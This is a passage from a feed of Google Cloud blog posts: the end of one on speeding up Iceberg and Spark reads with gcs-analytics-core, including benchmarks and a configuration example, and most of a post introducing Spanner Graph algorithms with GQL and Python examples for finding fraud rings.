&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scan time improvement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Execution time improvement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;71.51%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;32.61%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;10 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;48.48%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;18.94%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;100 GB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;40.98%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;10.95%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1 TB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;35.86%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3.38%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;10 TB&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;18.40%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;1.58%&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As the data shows, every dataset size improved, with the largest gains on the smaller datasets: scan time improvement ranged from 71.51% at 1 GB to 18.40% at 10 TB, and execution time improvement from 32.61% to 1.58%. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that lower overall query execution time.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before running your Spark workloads, confirm that the following requirements and configurations are met:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Configure your catalog to use GCSFileIO.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the gcs-analytics-core optimization flag (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable vectorized I/O (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spark.sql.iceberg.vectorization.enabled=true&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to get the full read performance benefit.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;spark-submit \
  --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \
  --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \
  --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \
  --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \
  --conf spark.sql.iceberg.vectorization.enabled=true \
  &amp;lt;your-application-jar-or-script&amp;gt;&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
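&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you generate job submissions from a script, the same properties can be assembled programmatically. The following Python sketch is only a convenience illustration: the two helper functions are hypothetical names, and the property keys and values are the ones listed above. It builds the settings for a given catalog name and flattens them into spark-submit arguments.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;

```python
def iceberg_gcs_conf(catalog_name: str) -> dict:
    """Return the Spark properties from this post for one Iceberg catalog."""
    prefix = f"spark.sql.catalog.{catalog_name}"
    return {
        prefix: "org.apache.iceberg.spark.SparkCatalog",
        f"{prefix}.io-impl": "org.apache.iceberg.gcp.gcs.GCSFileIO",
        f"{prefix}.gcs.analytics-core.enabled": "true",
        "spark.sql.iceberg.vectorization.enabled": "true",
    }


def to_submit_args(conf: dict) -> list:
    """Flatten the properties into spark-submit --conf arguments."""
    args = []
    for key, value in conf.items():
        args += ["--conf", f"{key}={value}"]
    return args
```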
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The gcs-analytics-core library is open source, so you can explore the source code and contribute to the project. Our implementation and micro-benchmark configurations are part of the repository, and you can reference them for your own contributions or validations.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;GitHub repository:&lt;/strong&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GoogleCloudPlatform/gcs-analytics-core&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Documentation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Review the&lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/gcs-analytics-core" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;design document&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for deep architectural details.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</guid><category>Streaming</category><category>Data Analytics</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/data-analytics/optimize-iceberg-and-spark-workloads-with-gcs-analytics-core/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Ajay Yadav</name><title>Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Nivedita Aggarwal</name><title>Engineering Manager</title><department></department><company></company></author></item><item><title>Announcing Spanner Graph algorithms: Google-grade intelligence for connected data</title><link>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud Next, we announced the preview of graph algorithms with &lt;/span&gt;&lt;a href="https://cloud.google.com/products/spanner/graph"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, bringing Google Research’s state-of-the-art &lt;/span&gt;&lt;a href="https://research.google/teams/graph-mining/" 
rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;graph mining&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Tight integration with GQL:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Near-zero transactional impact and lower TCO:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/databoost/databoost-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Boost&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Global insights on billion-edge graphs in minutes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While Google Research has published several research papers, held &lt;/span&gt;&lt;a href="https://gm-neurips-2020.github.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;workshops&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and released open-source projects based on its graph mining tools (e.g., for &lt;/span&gt;&lt;a href="https://arxiv.org/html/2411.10290v1" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-core clustering&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Algorithms: Deeper insights for connected data&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within &lt;/span&gt;&lt;a href="https://cloud.google.com/spanner"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Google’s highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using the ISO GQL, while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We use g&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;raphs extensively at Google. In fact, many popular algorithms like &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/PageRank" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;PageRank&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Centrality&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Community detection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Similarity and path finding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;neighbors&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
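&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make the similarity measures concrete, here is a minimal sketch of their textbook definitions over neighbor sets. It is illustrative only: the toy graph and function names are hypothetical, and the definitions Spanner Graph uses (for example, around edge direction or weights) may differ.&lt;/span&gt;&lt;/p&gt;

```python
from math import sqrt

# Hypothetical toy graph: each node maps to the set of its neighbors.
NEIGHBORS = {
    "a": {"x", "y", "z"},
    "b": {"y", "z", "w"},
    "c": {"q"},
}


def common_neighbors(u, v, adj=NEIGHBORS):
    """Number of neighbors shared by u and v."""
    return len(adj[u].intersection(adj[v]))


def total_neighbors(u, v, adj=NEIGHBORS):
    """Number of distinct neighbors of u or v."""
    return len(adj[u].union(adj[v]))


def jaccard(u, v, adj=NEIGHBORS):
    """Shared neighbors divided by distinct neighbors (0.0 if there are none)."""
    total = total_neighbors(u, v, adj)
    return common_neighbors(u, v, adj) / total if total else 0.0


def cosine(u, v, adj=NEIGHBORS):
    """Cosine similarity of the two binary neighbor vectors."""
    denom = sqrt(len(adj[u]) * len(adj[v]))
    return common_neighbors(u, v, adj) / denom if denom else 0.0
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this toy graph, nodes a and b share two of their four distinct neighbors, so their Jaccard similarity is 0.5, while a and c share none.&lt;/span&gt;&lt;/p&gt;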
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;An integrated developer experience&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can invoke g&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;raph algorithms directly using GQL on the entire graph, subgraphs, or a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. Additionally, you can also store results in Cloud Storage buckets.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Example: Uncovering the ringleader of a fraudulent network&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 1: Identify communities of accounts (algorithm)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;First, we apply a modularity clustering algorithm to cluster accounts into communities. We then write the resulting &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;community_id&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; directly back to the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Account&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; in Spanner Graph.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_community_detection.max-1000x1000.jpg"
        
          alt="1_community_detection"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;-- Runs community detection and writes the results back to the graph
EXPORT DATA OPTIONS(
  format = 'CLOUD_SPANNER',
  table = 'Account',
  write_mode = 'update_ignore_all'
) AS
GRAPH FinGraph
CALL ModularityClustering(
  node_labels =&amp;gt; ['Account'],
  edge_labels =&amp;gt; ['Transfer']
)
YIELD node, cluster
RETURN node.id, cluster AS community_id;&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
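&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modularity clustering looks for a partition that scores well on modularity, which compares the share of edges inside each community with the share expected if edges were placed at random. The sketch below only computes that score for a given partition, using the standard formula for undirected, unweighted graphs. It is not Spanner Graph's implementation: the function name and sample data are hypothetical, and treating transfers as undirected is an assumption.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict


def modularity(edges, community_of):
    """Modularity Q of a partition of an undirected, unweighted graph.

    Q = sum over communities c of (L_c / m - (k_c / (2 * m)) ** 2), where
    L_c counts edges inside c, k_c sums the degrees in c, and m = len(edges).
    """
    m = len(edges)
    if m == 0:
        return 0.0
    intra = defaultdict(int)   # edges with both endpoints in the community
    degree = defaultdict(int)  # summed degree of the community's nodes
    for u, v in edges:
        cu, cv = community_of[u], community_of[v]
        degree[cu] += 1
        degree[cv] += 1
        if cu == cv:
            intra[cu] += 1
    return sum(intra[c] / m - (degree[c] / (2 * m)) ** 2 for c in degree)


# Hypothetical data: two triangles of accounts joined by a single transfer.
EDGES = [(1, 2), (2, 3), (1, 3), (4, 5), (5, 6), (4, 6), (3, 4)]
BY_TRIANGLE = {1: "A", 2: "A", 3: "A", 4: "B", 5: "B", 6: "B"}
ALL_IN_ONE = {node: "A" for node in BY_TRIANGLE}
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Splitting the sample graph by triangle scores higher than putting every account in one community, which is the kind of difference a clustering algorithm exploits.&lt;/span&gt;&lt;/p&gt;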
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 2: Pinpoint the suspicious community (query)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Now that every account belongs to a community, we can use a GQL query to perform analytical queries on each community to uncover anomalous behaviors. For example, we can check the total number of known fraud accounts within each community.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;-- Finds the community with the highest concentration of flagged fraud
GRAPH FinGraph
MATCH (a:Account)
WHERE a.community_id IS NOT NULL
  AND a.fraud_flag = TRUE
RETURN a.community_id AS community_id, COUNT(*) AS fraud_count
ORDER BY fraud_count DESC;&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
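&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For readers less familiar with GQL, the same filter, group, and sort logic can be sketched in plain Python. The rows below are hypothetical and only mirror the account properties used in the query.&lt;/span&gt;&lt;/p&gt;

```python
from collections import Counter

# Hypothetical rows mirroring the Account properties used in the query.
ACCOUNTS = [
    {"id": 1, "community_id": 2, "fraud_flag": True},
    {"id": 2, "community_id": 2, "fraud_flag": True},
    {"id": 3, "community_id": 2, "fraud_flag": False},
    {"id": 4, "community_id": 7, "fraud_flag": True},
    {"id": 5, "community_id": None, "fraud_flag": True},
]


def fraud_count_by_community(accounts):
    """Return (community_id, fraud_count) pairs, highest count first."""
    counts = Counter(
        account["community_id"]
        for account in accounts
        # Keep only flagged accounts that were assigned to a community.
        if account["community_id"] is not None and account["fraud_flag"]
    )
    return counts.most_common()
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note that this counts flagged accounts rather than measuring their share of each community; dividing by community size would be a reasonable refinement if communities vary widely in size.&lt;/span&gt;&lt;/p&gt;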
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_centrality.max-1000x1000.jpg"
        
          alt="2_centrality"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;EXPORT DATA OPTIONS(
  format = 'CLOUD_SPANNER',
  table = 'Account',
  write_mode = 'update_ignore_all'
) AS
-- Specifies a suspicious subgraph
GRAPH FinGraph
MATCH (n:Account {community_id: 2})
RETURN n
FULL UNION ALL
MATCH -[e:Transfer]-&amp;gt;
RETURN e
NEXT
-- Runs PageRank
CALL PER() PageRank(max_iterations =&amp;gt; 20)
YIELD node, score
RETURN node.id, score AS pagerank_score;&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
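&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a rough illustration of what a PageRank score captures, here is a minimal power-iteration sketch in Python. It is a textbook version, not Spanner Graph's implementation: the damping factor of 0.85 is the conventional default and an assumption here, the handling of accounts without outgoing transfers is one common choice among several, and the sample accounts are hypothetical.&lt;/span&gt;&lt;/p&gt;

```python
def pagerank(nodes, edges, damping=0.85, max_iterations=20):
    """Power-iteration PageRank over directed (source, target) edges.

    Assumes every edge endpoint appears in `nodes`.
    """
    nodes = list(nodes)
    n = len(nodes)
    out_links = {node: [] for node in nodes}
    for src, dst in edges:
        out_links[src].append(dst)
    score = {node: 1.0 / n for node in nodes}
    for _ in range(max_iterations):
        # Score held by nodes without outgoing edges is spread evenly.
        dangling = sum(score[v] for v in nodes if not out_links[v])
        nxt = {v: (1.0 - damping) / n + damping * dangling / n for v in nodes}
        for src in nodes:
            for dst in out_links[src]:
                # Each node splits its score equally across its out-edges.
                nxt[dst] += damping * score[src] / len(out_links[src])
        score = nxt
    return score


# Hypothetical community: three mule accounts all transfer to one account.
COMMUNITY = ["m1", "m2", "m3", "boss"]
TRANSFERS = [("m1", "boss"), ("m2", "boss"), ("m3", "boss")]
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this sample, the account that receives transfers from every mule ends up with the highest score, which is the intuition behind using centrality to look for a ringleader.&lt;/span&gt;&lt;/p&gt;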
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Step 4: Investigate the target (query)&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Now that the accounts in Community &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; have a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;pagerank_score&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, we can write a query that isolates the most central account and that immediately traces where that specific ringleader moved their funds recently.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;-- Finds the top scorer (ringleader) and traces their money
GRAPH FinGraph
MATCH (ringleader:Account {community_id: 2})
ORDER BY ringleader.pagerank_score DESC
LIMIT 1
WITH ringleader
MATCH (ringleader)-[e:Transfer]-&amp;gt;{1, 5}(receiver:Account)
WHERE e.ts &amp;gt; '2025-12-01'
